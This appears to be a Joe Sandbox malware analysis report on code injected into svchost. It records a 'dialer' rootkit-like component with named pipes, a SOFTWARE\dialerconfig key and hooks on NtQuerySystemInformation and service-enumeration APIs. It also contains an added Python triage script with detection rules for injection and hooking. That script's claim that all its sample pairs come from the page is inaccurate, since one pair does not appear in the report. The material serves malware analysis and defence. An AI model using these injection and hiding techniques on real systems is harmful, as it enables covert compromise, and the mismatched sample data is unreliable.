                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: 36eee36a702be5d229b17d9c9138d260910e3688b71927c4caf75304bb23e6ee
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: FE41A232359F8082EB26DF25F84A7AA77A0F798795F504021EE4D87794EB3CD441CB48
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: e302ae30e49da29a726c6f913943f5073bbf1f5ae9d0972a697904f802fd5f1d
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 55112B36219F8082EB668B25F84635977E5F788B95F584260EECD07758DF3CC551CB04
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 5c07be2ebc4b5c2c17967540651cfe820deff558361af11c6e94b5f60bbdcb6a
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 5FE086A1684F4490DF078F21FC4629873A0EB59B64F499162995C0A311FA38D1F9C300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 558cecf372c16398b9b2aefa91b5521037ba77d7552cbc05b4debd7ca50bbfaf
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 65E086A1644F4490DF068F21E8421987360E759B54F889162C95C0A311EA38D1E5C300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: 2d0e3eb43654a43f3f6b80af6b512799269a4d278d6165dc18c830e96e57c320
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: F8118C25645F4882EA0ADB66F84B72973A1FB89FC2F184468DE8D47766DE38C442C304
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: 8832b056897a9b8ba16723e3fafdb3eff0c8063a4678bd85c9cbe2902852df6c
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: 48E06535A41F0486EB09CF62EC0E74A36E1FB89F06F08C424C91907361DF7D8499CB90

Control-flow Graph

Memory Dump Source
• Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0

Control-flow Graph

Memory Dump Source
• Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0

Control-flow Graph

APIs
  • Part of subcall function 000001F28C931628: GetProcessHeap.KERNEL32 ref: 000001F28C931633
  • Part of subcall function 000001F28C931628: HeapAlloc.KERNEL32 ref: 000001F28C931642
  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316B2
  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316DF
  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9316F9
  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931719
  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931734
  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931754
  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93176F
  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93178F
  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317AA
  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9317CA
• Sleep.KERNEL32 ref: 000001F28C931AD7
• SleepEx.KERNELBASE ref: 000001F28C931ADD
  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317E5
  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931805
  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931820
  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931840
  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93185B
  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93187B
  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931896
  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9318A0
Memory Dump Source
• Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
Similarity
• API ID: CloseOpen$HeapSleep$AllocProcess
• String ID:
• API String ID: 1534210851-0

Control-flow Graph

Memory Dump Source
• Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
Similarity
• API ID:
• String ID: dialer
• API String ID: 0-3528709123

Control-flow Graph

Memory Dump Source
• Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0

Control-flow Graph

Memory Dump Source
• Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0

Control-flow Graph

Memory Dump Source
• Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
Memory Dump Source
• Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
Memory Dump Source
• Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0

Control-flow Graph

Memory Dump Source
• Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-2879589442

Control-flow Graph

Memory Dump Source
• Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436

Control-flow Graph

Memory Dump Source
• Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
• API String ID: 4175298099-1975688563

Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 3ae14674ec2a8346f3f84ed9e0c01df585913646f7da2965e941060b61735599
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: F581F0717C0E038AFA54DB66A4C03F96ED0AB85BC0F448935FB498379ADB38E8458700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 000001F28C93CE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEBC
                                                                                • SetLastError.KERNEL32 ref: 000001F28C93CED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,000001F28C93ECCC,?,?,?,?,000001F28C93BF9F,?,?,?,?,?,000001F28C937AB0), ref: 000001F28C93CF2C
                                                                                  • Part of subcall function 000001F28C93D6CC: HeapAlloc.KERNEL32 ref: 000001F28C93D721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF54
                                                                                  • Part of subcall function 000001F28C93D744: HeapFree.KERNEL32 ref: 000001F28C93D75A
                                                                                  • Part of subcall function 000001F28C93D744: GetLastError.KERNEL32 ref: 000001F28C93D764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF76
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: c1dccc9a58c3acbe364e99b3de5aaac7dedc88dfaa24f6078136831367b18d4b
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 274149713C1EC782FA68A73159553FA22C25B84BF4F2C27B4E836076E6EF3998018200

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: 57cb264d3990d0bdc8e496bdce57bc45f54469c11ba177c15f029bb998e39be8
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: BE213876658E82C2EB209B25F4443BA67E0F789BE5F544265EA5907AA8DF3CC149CB00
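
The function summary above pairs process, thread, write and Wow64 API fragments with two named-pipe strings. The Python below is an added triage example, not part of the Joe Sandbox report or of the analysed sample: it parses API ID / String ID pairs in the format used on this page (assumed here to be '$'-separated groups of alphabetically sorted CamelCase fragments of Win32 API names), tags fragment combinations that suggest remote process writes plus thread creation, an IsWow64Process architecture check, or VirtualProtect against the current module, extracts the pipe names as hunt IOCs, and compares a caller-supplied list of live pipe names against them. The rule names and the matching heuristics are the example's own assumptions; the four summary pairs embedded as sample input are copied from this page, everything else is constructed.

```python
import re
from dataclasses import dataclass, field

# Four API ID / String ID pairs copied from the report above; the harness
# around them is an added example, not Joe Sandbox code.
SAMPLE_SUMMARIES = r"""
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
"""

PIPE_PREFIX = "\\\\.\\pipe\\"          # the literal prefix \\.\pipe\
API_RE = re.compile(r"^\W*API ID:\s*(.*)$")
STR_RE = re.compile(r"^\W*String ID:\s*(.*)$")
# One CamelCase fragment, optionally followed by digits (Wow64, Handler3).
FRAG = re.compile(r"[A-Za-z][a-z]*\d*")

# Heuristic fragment combinations written for this example (assumption: the
# API ID is built from fragments of the Win32 names the function calls).
RULES = {
    "remote-process-write-and-thread": {"Process", "Write", "Thread", "Create"},
    "wow64-architecture-check": {"Wow64", "Process"},        # IsWow64Process
    "self-virtualprotect": {"Virtual", "Protect", "Current", "Process", "Module"},
    "process-enumeration": {"Process", "Enum"},
}


@dataclass
class Finding:
    api_id: str
    strings: list[str]
    tags: list[str] = field(default_factory=list)

    @property
    def pipes(self) -> list[str]:
        return [s for s in self.strings if s.startswith(PIPE_PREFIX)]


def api_fragments(api_id: str) -> set[str]:
    """Split a '$'-grouped API ID into its CamelCase fragments."""
    frags: set[str] = set()
    for group in api_id.split("$"):
        frags.update(FRAG.findall(group))
    return frags


def parse_summaries(text: str) -> list[Finding]:
    """Pair each 'API ID' line with the 'String ID' line that follows it.
    Caveat: '$' is also the list separator, so a referenced string that itself
    contains '$' (e.g. CONOUT$) is split; treat such strings with care."""
    findings: list[Finding] = []
    pending = None
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            pending = m.group(1).strip()
            continue
        m = STR_RE.match(line)
        if m and pending is not None:
            raw = m.group(1).strip()
            strings = [s for s in raw.split("$") if s] if raw else []
            findings.append(Finding(pending, strings))
            pending = None
    return findings


def triage(text: str) -> list[Finding]:
    """Tag every summary whose fragments satisfy a rule or reference a pipe."""
    findings = parse_summaries(text)
    for f in findings:
        frags = api_fragments(f.api_id)
        f.tags = [name for name, need in RULES.items() if need <= frags]
        if f.pipes:
            f.tags.append("named-pipe")
    return findings


def pipe_iocs(findings: list[Finding]) -> set[str]:
    """Bare pipe names (prefix removed) to hunt for on endpoints."""
    return {p[len(PIPE_PREFIX):] for f in findings for p in f.pipes}


def match_pipe_iocs(pipe_names, iocs) -> list[str]:
    """Case-insensitive match of live pipe names against the IOC set. On a
    Windows host the live list is os.listdir("\\\\.\\pipe\\"); it is passed in
    as a parameter so this runs anywhere."""
    wanted = {i.lower() for i in iocs}
    return sorted(n for n in pipe_names if n.lower() in wanted)


if __name__ == "__main__":
    results = triage(SAMPLE_SUMMARIES)
    for f in results:
        print(f"{f.api_id:<72} tags={f.tags} pipes={f.pipes}")
    print("hunt for pipes:", sorted(pipe_iocs(results)))
```

The two CRT summaries (FLS values, api-ms- library loading) produce no tags, which is the intended behaviour: the rules are meant to surface the injection and hooking primitives, not every Win32 call the runtime makes. Paste the whole report text into triage() rather than the four sample pairs to rank all functions at once.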

                                                                                Control-flow Graph

                                                                                control_flow_graph: function 1f28c1d9944 (entry block 1f28c1d9944-1f28c1d99ac; first callee 1f28c1da814). Legend: Executed / Not Executed. The basic-block and edge list was rendered as a graph in the original report and is not reproduced here.
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: a9609446f00a766f3d3b655ef47b5d2ff7605ba4997714f758606ca2dc9d6f4c
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: 38E15672644F828AEB609F65E4803ED7BE0F755BD8F104125EB8957B9ACF38E491C740

                                                                                Control-flow Graph

                                                                                control_flow_graph: function 1f28c93a544 (entry block 1f28c93a544-1f28c93a5ac; first callee 1f28c93b414). Legend: Executed / Not Executed. The basic-block and edge list was rendered as a graph in the original report and is not reproduced here.
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: e40025dd339e04ccce31ab42e6e43acdbfcb282d0efd4a44ebad16c513d6860d
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 51E17A72640B828AEB209BB598803FD77E0F755BE8F196166EE8957B99CF34C481C701
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: 13c93742e32ee18173703abb3e1a129c63d5b1ec7d71d03a5c5f3c659c718adc
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 1E41AF72391E82D1EB16CB76A9087F623D1FB49BE0F0962B9DD0A87785EF39C4458314
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: e61549d0980b68c844d3942048ca76a1816c2b656e0948ec105a341f4de0e688
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 2D412A72254FC5CAE760CF61E4447EA77E1F389B99F448129DA8907B58EF38C589CB40
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D087
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 5dc8ff007fbd2db76a624d83063225198278ec11a387f4125d1c2f12366c8b68
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: D2119332794EC782FA68973565613FA62C95B44BF4F1C63F4E839076EADF38C4028200
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 9b580adf4509b41eb4a94773ff5a8102b7ce542dff54e5b26089740a9ad9f4c5
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: ED81F771780EC386FB54AB35AA513F922D1AB85BCCF1CA4F5E90987796EB38C845C710
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
